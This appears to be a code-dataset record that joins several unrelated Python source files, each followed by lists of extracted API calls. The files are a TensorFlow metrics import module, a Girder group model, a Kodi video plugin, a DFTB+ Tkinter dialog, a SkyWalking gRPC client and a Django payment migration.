from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
# pylint: enable=unused-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| [
"tensorflow.python.util.all_util.remove_undocumented"
]
| [((6155, 6184), 'tensorflow.python.util.all_util.remove_undocumented', 'remove_undocumented', (['__name__'], {}), '(__name__)\n', (6174, 6184), False, 'from tensorflow.python.util.all_util import remove_undocumented\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
from .model_base import AccessControlledModel,\
ValidationException,\
AccessException
from girder.constants import AccessType
class Group(AccessControlledModel):
"""
Groups are simply groups of users. The primary use of grouping users is
to simplify access control for resources in the system, but they can
be used for other purposes that require groupings of users as well.
Group membership is stored in the database on the user document only;
there is no "users" field in this model. This is to optimize for the most
common use case for querying membership, which involves checking access
control policies, which is always done relative to a specific user. The
task of querying all members within a group is much less common and
typically only performed ona single group at a time, so doing a find on the
indexed group list in the user collection is sufficiently fast.
Users with READ access on the group can see the group and its members.
Users with WRITE access on the group can add and remove members and
change the name or description.
Users with ADMIN access can delete the entire group.
"""
def initialize(self):
self.name = 'group'
self.ensureIndices(['lowerName'])
self.ensureTextIndex({
'name': 10,
'description': 1
})
def validate(self, doc):
doc['name'] = doc['name'].strip()
doc['lowerName'] = doc['name'].lower()
doc['description'] = doc['description'].strip()
if not doc['name']:
raise ValidationException('Group name must not be empty.', 'name')
q = {
'lowerName': doc['lowerName'],
}
if '_id' in doc:
q['_id'] = {'$ne': doc['_id']}
duplicates = self.find(q, limit=1, fields=['_id'])
if duplicates.count() != 0:
raise ValidationException('A group with that name already'
'exists.', 'name')
return doc
def list(self, user=None, limit=50, offset=0, sort=None):
"""
Search for groups or simply list all visible groups.
:param text: Pass this to perform a text search of all groups.
:param user: The user to search as.
:param limit: Result set size limit.
:param offset: Offset into the results.
:param sort: The sort direction.
"""
# Perform the find; we'll do access-based filtering of the result
# set afterward.
cursor = self.find({}, limit=0, sort=sort)
for r in self.filterResultsByPermission(cursor=cursor, user=user,
level=AccessType.READ,
limit=limit, offset=offset):
yield r
def remove(self, group):
"""
Delete a group, and all references to it in the database.
:param group: The group document to delete.
:type group: dict
"""
# Remove references to this group from user group membership lists
self.model('user').update({
'groups': group['_id']
}, {
'$pull': {'groups': group['_id']}
})
acQuery = {
'access.groups.id': group['_id']
}
acUpdate = {
'$pull': {
'access.groups': {'id': group['_id']}
}
}
# Remove references to this group from access-controlled collections.
self.update(acQuery, acUpdate)
self.model('collection').update(acQuery, acUpdate)
self.model('folder').update(acQuery, acUpdate)
self.model('user').update(acQuery, acUpdate)
# Finally, delete the document itself
AccessControlledModel.remove(self, group)
def getMembers(self, group, offset=0, limit=50, sort=None):
"""
Return the list of all users who belong to this group.
:param group: The group to list members on.
:param offset: Offset into the result set of users.
:param limit: Result set size limit.
:param sort: Sort parameter for the find query.
:returns: List of user documents.
"""
q = {
'groups': group['_id']
}
cursor = self.model('user').find(
q, offset=offset, limit=limit, sort=sort)
users = []
for user in cursor:
users.append(user)
return users
def addUser(self, group, user, level=AccessType.READ):
"""
Add the user to the group. Records membership in the group in the
user document, and also grants the specified access level on the
group itself to the user. Any group member has at least read access on
the group.
"""
if not 'groups' in user:
user['groups'] = []
if not group['_id'] in user['groups']:
user['groups'].append(group['_id'])
self.model('user').save(user, validate=False)
self.setUserAccess(group, user, level, save=True)
return group
def joinGroup(self, group, user):
"""
Call this when the user accepts an invitation.
"""
if not 'groupInvites' in user:
user['groupInvites'] = []
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
self.addUser(group, user, level=invite['level'])
user['groupInvites'].remove(invite)
self.model('user').save(user, validate=False)
break
else:
raise AccessException('User was not invited to this group.')
return group
def inviteUser(self, group, user, level=AccessType.READ):
"""
Invite a user to join the group. Inviting them automatically
grants the user read access to the group so that they can see it.
Once they accept the invitation, they will be given the specified level
of access.
"""
# User has to be able to see the group to join it
self.setUserAccess(group, user, AccessType.READ, save=True)
if group['_id'] in user.get('groups', []):
raise ValidationException('User is already in this group.')
if not 'groupInvites' in user:
user['groupInvites'] = []
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
invite['level'] = level
break
else:
user['groupInvites'].append({
'groupId': group['_id'],
'level': level
})
return self.model('user').save(user, validate=False)
def removeUser(self, group, user):
"""
Remove the user from the group.
"""
# Remove group membership for this user.
if 'groups' in user and group['_id'] in user['groups']:
user['groups'].remove(group['_id'])
self.model('user').save(user, validate=False)
# Remove all group access for this user on this group.
self.setUserAccess(group, user, level=None, save=True)
return group
def createGroup(self, name, creator, description='', public=True):
"""
Create a new group. The creator will be given admin access to it.
:param name: The name of the folder.
:type name: str
:param description: Description for the folder.
:type description: str
:param public: Whether the group is publicly visible.
:type public: bool
:param creator: User document representing the creator of the group.
:type creator: dict
:returns: The group document that was created.
"""
assert type(public) is bool
now = datetime.datetime.now()
group = {
'name': name,
'description': description,
'created': now,
'updated': now
}
self.setPublic(group, public=public)
# Now validate and save the group
self.save(group)
# We make the creator a member of this group and also grant them
# admin access over the group.
self.addUser(group, creator, level=AccessType.ADMIN)
return group
| [
"datetime.datetime.now"
]
| [((8645, 8668), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8666, 8668), False, 'import datetime\n')] |
# -*- coding: utf-8 -*-
import sys
import urllib
import urlparse
# import xbmc
import xbmcgui
import xbmcplugin
import aci
# Get the plugin url in plugin:// notation.
_url = sys.argv[0]
# Get the plugin handle as an integer number.
_handle = int(sys.argv[1])
# Get an instance of ACI.
ATV = aci.ACI()
ATV.load_aci()
# Encode user agent headers for video.
user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 '
'Firefox/47.0 FirePHP/0.7.4',
'X-Requested-With': 'ShockwaveFlash/2172.16.17.32'
})
def get_url(**kwargs):
"""
Create a URL for calling the plugin recursively from the given set of keyword arguments.
:param kwargs: "argument=value" pairs
:type kwargs: dict
:return: plugin call URL
:rtype: str
"""
return '{0}?{1}'.format(_url, urllib.urlencode(kwargs))
def get_categories():
"""
Get the list of video categories.
Here you can insert some parsing code that retrieves
the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.)
from some site or server.
.. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:return: The list of video categories
:rtype: types.GeneratorType
"""
return ATV.aci.iterkeys()
def get_videos(category):
"""
Get the list of video files/streams.
Here you can insert some parsing code that retrieves
the list of video streams in the given category from some site or server.
.. note:: Consider using `generators functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:param category: Category name
:type category: str
:return: the list of videos in the category
:rtype: list
"""
return ATV.aci[category]
def list_categories():
"""
Create the list of video categories in the Kodi interface.
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, 'ACI')
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get video categories
categories = get_categories()
# Iterate through categories
for category in categories:
# xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE)
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=category.title())
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': "icon.png",
'icon': "icon.png",
'fanart': "icon.png"})
# Set additional info for the list item.
# Here we use a category name for both properties for for simplicity's sake.
# setInfo allows to set various information for an item.
# For available properties see the following link:
# https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14
# 'mediatype' is needed for a skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': category.title(),
'genre': category.title(),
'mediatype': 'video'})
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=listing&category=[category name]
url = get_url(action="listing", category=category)
# is_folder = True means that this item opens a sub-list of lower level items.
is_folder = True
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
"""
Create the list of playable videos in the Kodi interface.
:param category: Category name
:type category: str
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, category)
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get the list of videos in the category.
videos = get_videos(category)
# Iterate through each video.
for video_id in videos:
# Get the video item to process.
video_item = videos[video_id]
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=video_item["title"])
# Set additional info for the list item.
# 'mediatype' is needed for skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': video_item["title"],
'genre': category.title(),
'mediatype': 'video'})
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': video_item["thumbnail"],
'icon': video_item["thumbnail"],
'fanart': video_item["thumbnail"]
})
# Set 'IsPlayable' property to 'true'.
# This is mandatory for playable items!
list_item.setProperty('IsPlayable', 'true')
referer_header = urllib.urlencode({"Referer": video_item["location"]})
video_item['url'] += '|%s&%s' % (user_agent_headers, referer_header)
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=play&
# video=[video url]
url = get_url(action='play', video=video_item['url'])
# video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \
# '&streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \
# '&|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \
# 'FirePHP/0.7.4&X-Requested-With=ShockwaveFlash/22.0.0.192&Referer=' + \
# urllib.quote_plus(video['reference'])
# url = get_url(action='play', video=video_url)
# Add the list item to a virtual Kodi folder.
# is_folder = False means that this item won't open any sub-list.
is_folder = False
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def play_video(path):
"""
Play a video by the provided path.
:param path: Fully-qualified video URL
:type path: str
"""
# Create a playable item with a path to play.
play_item = xbmcgui.ListItem(path=path)
# Play with inputstream addon.
play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')
play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring: URL encoded plugin paramstring
:type paramstring: str
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(urlparse.parse_qsl(paramstring))
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Load the videos for aci.
if params['category'] == "shows":
ATV.update_aci_shows()
print("Updated from main shows.")
elif params['category'] == "cable":
ATV.update_aci_cable()
print("Updated from main cable.")
elif params['category'] == "movies":
ATV.update_aci_movies()
print("Updated from main movies.")
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the provided paramstring does not contain a supported action
# we raise an exception. This helps to catch coding errors,
# e.g. typos in action names.
raise ValueError('Invalid paramstring: {0}!'.format(paramstring))
else:
# Load ATV.
ATV.load_aci()
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
| [
"xbmcplugin.setContent",
"xbmcplugin.setResolvedUrl",
"xbmcplugin.addDirectoryItem",
"urllib.urlencode",
"xbmcgui.ListItem",
"urlparse.parse_qsl",
"xbmcplugin.setPluginCategory",
"xbmcplugin.endOfDirectory",
"xbmcplugin.addSortMethod",
"aci.ACI"
]
| [((296, 305), 'aci.ACI', 'aci.ACI', ([], {}), '()\n', (303, 305), False, 'import aci\n'), ((382, 566), 'urllib.urlencode', 'urllib.urlencode', (["{'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/2172.16.17.32'}"], {}), "({'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/2172.16.17.32'})\n", (398, 566), False, 'import urllib\n'), ((2197, 2241), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', (['_handle', '"""ACI"""'], {}), "(_handle, 'ACI')\n", (2225, 2241), False, 'import xbmcplugin\n'), ((2347, 2387), 'xbmcplugin.setContent', 'xbmcplugin.setContent', (['_handle', '"""videos"""'], {}), "(_handle, 'videos')\n", (2368, 2387), False, 'import xbmcplugin\n'), ((4275, 4349), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', (['_handle', 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'], {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)\n', (4299, 4349), False, 'import xbmcplugin\n'), ((4394, 4428), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', (['_handle'], {}), '(_handle)\n', (4419, 4428), False, 'import xbmcplugin\n'), ((4699, 4746), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', (['_handle', 'category'], {}), '(_handle, category)\n', (4727, 4746), False, 'import xbmcplugin\n'), ((4852, 4892), 'xbmcplugin.setContent', 'xbmcplugin.setContent', (['_handle', '"""videos"""'], {}), "(_handle, 'videos')\n", (4873, 4892), False, 'import xbmcplugin\n'), ((7472, 7546), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', (['_handle', 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'], {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)\n', (7496, 7546), False, 'import xbmcplugin\n'), ((7591, 7625), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', (['_handle'], {}), '(_handle)\n', (7616, 7625), False, 'import xbmcplugin\n'), ((7835, 7862), 'xbmcgui.ListItem', 'xbmcgui.ListItem', ([], {'path': 'path'}), '(path=path)\n', (7851, 7862), False, 'import xbmcgui\n'), ((8085, 8145), 'xbmcplugin.setResolvedUrl', 'xbmcplugin.setResolvedUrl', (['_handle', '(True)'], {'listitem': 'play_item'}), '(_handle, True, listitem=play_item)\n', (8110, 8145), False, 'import xbmcplugin\n'), ((972, 996), 'urllib.urlencode', 'urllib.urlencode', (['kwargs'], {}), '(kwargs)\n', (988, 996), False, 'import urllib\n'), ((4119, 4182), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', (['_handle', 'url', 'list_item', 'is_folder'], {}), '(_handle, url, list_item, is_folder)\n', (4146, 4182), False, 'import xbmcplugin\n'), ((5206, 5249), 'xbmcgui.ListItem', 'xbmcgui.ListItem', ([], {'label': "video_item['title']"}), "(label=video_item['title'])\n", (5222, 5249), False, 'import xbmcgui\n'), ((6197, 6250), 'urllib.urlencode', 'urllib.urlencode', (["{'Referer': video_item['location']}"], {}), "({'Referer': video_item['location']})\n", (6213, 6250), False, 'import urllib\n'), ((7316, 7379), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', (['_handle', 'url', 'list_item', 'is_folder'], {}), '(_handle, url, list_item, is_folder)\n', (7343, 7379), False, 'import xbmcplugin\n'), ((8476, 8507), 'urlparse.parse_qsl', 'urlparse.parse_qsl', (['paramstring'], {}), '(paramstring)\n', (8494, 8507), False, 'import urlparse\n')] |
# -*- coding: utf-8 -*-
"""The graphical part of a DFTB+ Optimization node"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
import dftbplus_step
logger = logging.getLogger(__name__)
class TkOptimization(dftbplus_step.TkEnergy):
def __init__(
self,
tk_flowchart=None,
node=None,
canvas=None,
x=120,
y=20,
w=200,
h=50,
my_logger=logger,
keyword_metadata=None,
):
"""Initialize the graphical Tk DFTB+ optimization step
Keyword arguments:
"""
self.results_widgets = []
super().__init__(
tk_flowchart=tk_flowchart,
node=node,
canvas=canvas,
x=x,
y=y,
w=w,
h=h,
my_logger=my_logger,
keyword_metadata=keyword_metadata,
)
def right_click(self, event):
"""Probably need to add our dialog..."""
super().right_click(event)
self.popup_menu.add_command(label="Edit..", command=self.edit)
self.popup_menu.tk_popup(event.x_root, event.y_root, 0)
def create_dialog(
self, title="Edit DFTB+ Optimization Step", calculation="optimization"
):
"""Create the dialog!"""
self.logger.debug("Creating the dialog")
super().create_dialog(title=title, calculation=calculation)
# Create all the widgets
P = self.node.parameters
# Frame to isolate widgets
opt_frame = self["optimization frame"] = ttk.LabelFrame(
self["frame"],
borderwidth=4,
relief="sunken",
text="Optimization Parameters",
labelanchor="n",
padding=10,
)
for key in dftbplus_step.OptimizationParameters.parameters:
self[key] = P[key].widget(opt_frame)
self.logger.debug("Finished creating the dialog")
def reset_dialog(self, widget=None):
super().reset_dialog()
row = 0
self["optimization frame"].grid(row=row, column=1, sticky=tk.EW)
row += 1
# And the widgets in our frame
self.reset_optimization_frame()
return row
def reset_optimization_frame(self):
"""Layout the optimization frame according to the current values.
SD CG gDIIS LBFGS FIRE
------------------ ------------------- ------------------- ------------------- --------
MovedAtoms MovedAtoms MovedAtoms MovedAtoms TimeStep
MaxForceComponent MaxForceComponent MaxForceComponent MaxForceComponent
MaxSteps MaxSteps MaxSteps MaxSteps
OutputPrefix OutputPrefix OutputPrefix OutputPrefix
AppendGeometries AppendGeometries AppendGeometries AppendGeometries
Constraints Constraints Constraints Constraints
LatticeOpt LatticeOpt LatticeOpt LatticeOpt
FixAngles FixAngles FixAngles FixAngles
FixLengths
Isotropic Isotropic Isotropic Isotropic
Pressure Pressure Pressure Pressure
MaxAtomStep MaxAtomStep MaxAtomStep
MaxLatticeStep MaxLatticeStep MaxLatticeStep MaxLatticeStep
ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly
StepSize Alpha Memory
Generations LineSearch
""" # noqa: E501
frame = self["optimization frame"]
for slave in frame.grid_slaves():
slave.grid_forget()
method = self["optimization method"].get()
widgets = []
widgets1 = []
row = 0
w = self["optimization method"]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
if method == "Steepest descents":
w = self["StepSize"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "gDIIS" in method:
w = self["Alpha"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["Generations"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "LBFGS" in method:
w = self["Memory"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["LineSearch"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
for widget in (
"MaxForceComponent",
"MaxSteps",
"MaxAtomStep",
"stop_if_scc_fails",
):
w = self[widget]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
return row
| [
"logging.getLogger",
"tkinter.ttk.LabelFrame"
]
| [((174, 201), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (191, 201), False, 'import logging\n'), ((1550, 1677), 'tkinter.ttk.LabelFrame', 'ttk.LabelFrame', (["self['frame']"], {'borderwidth': '(4)', 'relief': '"""sunken"""', 'text': '"""Optimization Parameters"""', 'labelanchor': '"""n"""', 'padding': '(10)'}), "(self['frame'], borderwidth=4, relief='sunken', text=\n 'Optimization Parameters', labelanchor='n', padding=10)\n", (1564, 1677), True, 'import tkinter.ttk as ttk\n')] |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
from skywalking.protocol.common.Common_pb2 import KeyStringValuePair
from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub
from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub
from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties
from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub
from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery
from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub
from skywalking import config
from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \
LogDataReportService
from skywalking.command import command_service
from skywalking.loggings import logger
from skywalking.profile import profile_task_execution_service
class GrpcServiceManagementClient(ServiceManagementClient):
def __init__(self, channel: grpc.Channel):
self.service_stub = ManagementServiceStub(channel)
def send_instance_props(self):
self.service_stub.reportInstanceProperties(InstanceProperties(
service=config.service_name,
serviceInstance=config.service_instance,
properties=[KeyStringValuePair(key='language', value='Python')],
))
def send_heart_beat(self):
logger.debug(
'service heart beats, [%s], [%s]',
config.service_name,
config.service_instance,
)
self.service_stub.keepAlive(InstancePingPkg(
service=config.service_name,
serviceInstance=config.service_instance,
))
class GrpcTraceSegmentReportService(TraceSegmentReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = TraceSegmentReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcLogDataReportService(LogDataReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = LogReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcProfileTaskChannelService(ProfileTaskChannelService):
def __init__(self, channel: grpc.Channel):
self.task_stub = ProfileTaskStub(channel)
def do_query(self):
query = ProfileTaskCommandQuery(
service=config.service_name,
serviceInstance=config.service_instance,
lastCommandTime=profile_task_execution_service.get_last_command_create_time()
)
commands = self.task_stub.getProfileTaskCommands(query)
command_service.receive_command(commands)
| [
"skywalking.protocol.management.Management_pb2.InstancePingPkg",
"skywalking.protocol.language_agent.Tracing_pb2_grpc.TraceSegmentReportServiceStub",
"skywalking.protocol.common.Common_pb2.KeyStringValuePair",
"skywalking.command.command_service.receive_command",
"skywalking.loggings.logger.debug",
"skywalking.protocol.management.Management_pb2_grpc.ManagementServiceStub",
"skywalking.protocol.profile.Profile_pb2_grpc.ProfileTaskStub",
"skywalking.profile.profile_task_execution_service.get_last_command_create_time",
"skywalking.protocol.logging.Logging_pb2_grpc.LogReportServiceStub"
]
| [((1819, 1849), 'skywalking.protocol.management.Management_pb2_grpc.ManagementServiceStub', 'ManagementServiceStub', (['channel'], {}), '(channel)\n', (1840, 1849), False, 'from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub\n'), ((2179, 2277), 'skywalking.loggings.logger.debug', 'logger.debug', (['"""service heart beats, [%s], [%s]"""', 'config.service_name', 'config.service_instance'], {}), "('service heart beats, [%s], [%s]', config.service_name, config\n .service_instance)\n", (2191, 2277), False, 'from skywalking.loggings import logger\n'), ((2618, 2656), 'skywalking.protocol.language_agent.Tracing_pb2_grpc.TraceSegmentReportServiceStub', 'TraceSegmentReportServiceStub', (['channel'], {}), '(channel)\n', (2647, 2656), False, 'from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub\n'), ((2865, 2894), 'skywalking.protocol.logging.Logging_pb2_grpc.LogReportServiceStub', 'LogReportServiceStub', (['channel'], {}), '(channel)\n', (2885, 2894), False, 'from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub\n'), ((3111, 3135), 'skywalking.protocol.profile.Profile_pb2_grpc.ProfileTaskStub', 'ProfileTaskStub', (['channel'], {}), '(channel)\n', (3126, 3135), False, 'from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub\n'), ((3470, 3511), 'skywalking.command.command_service.receive_command', 'command_service.receive_command', (['commands'], {}), '(commands)\n', (3501, 3511), False, 'from skywalking.command import command_service\n'), ((2356, 2446), 'skywalking.protocol.management.Management_pb2.InstancePingPkg', 'InstancePingPkg', ([], {'service': 'config.service_name', 'serviceInstance': 'config.service_instance'}), '(service=config.service_name, serviceInstance=config.\n service_instance)\n', (2371, 2446), False, 'from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties\n'), ((3325, 3386), 'skywalking.profile.profile_task_execution_service.get_last_command_create_time', 'profile_task_execution_service.get_last_command_create_time', ([], {}), '()\n', (3384, 3386), False, 'from skywalking.profile import profile_task_execution_service\n'), ((2075, 2125), 'skywalking.protocol.common.Common_pb2.KeyStringValuePair', 'KeyStringValuePair', ([], {'key': '"""language"""', 'value': '"""Python"""'}), "(key='language', value='Python')\n", (2093, 2125), False, 'from skywalking.protocol.common.Common_pb2 import KeyStringValuePair\n')] |
# Generated by Django 3.0.3 on 2020-02-07 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coingate', '0003_auto_20200207_1513'),
]
operations = [
migrations.RemoveField(
model_name='payment',
name='token',
),
migrations.AddField(
model_name='payment',
name='expire_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='payment',
name='pay_amount',
field=models.DecimalField(blank=True, decimal_places=1, max_digits=10, null=True),
),
migrations.AddField(
model_name='payment',
name='payment_address',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='payment',
name='created_at',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AlterField(
model_name='payment',
name='price_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='receive_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='status',
field=models.CharField(choices=[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), ('confirming', 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'), ('refunded', 'Refunded')], default='new', max_length=10),
),
]
| [
"django.db.models.DateTimeField",
"django.db.models.DecimalField",
"django.db.migrations.RemoveField",
"django.db.models.CharField"
]
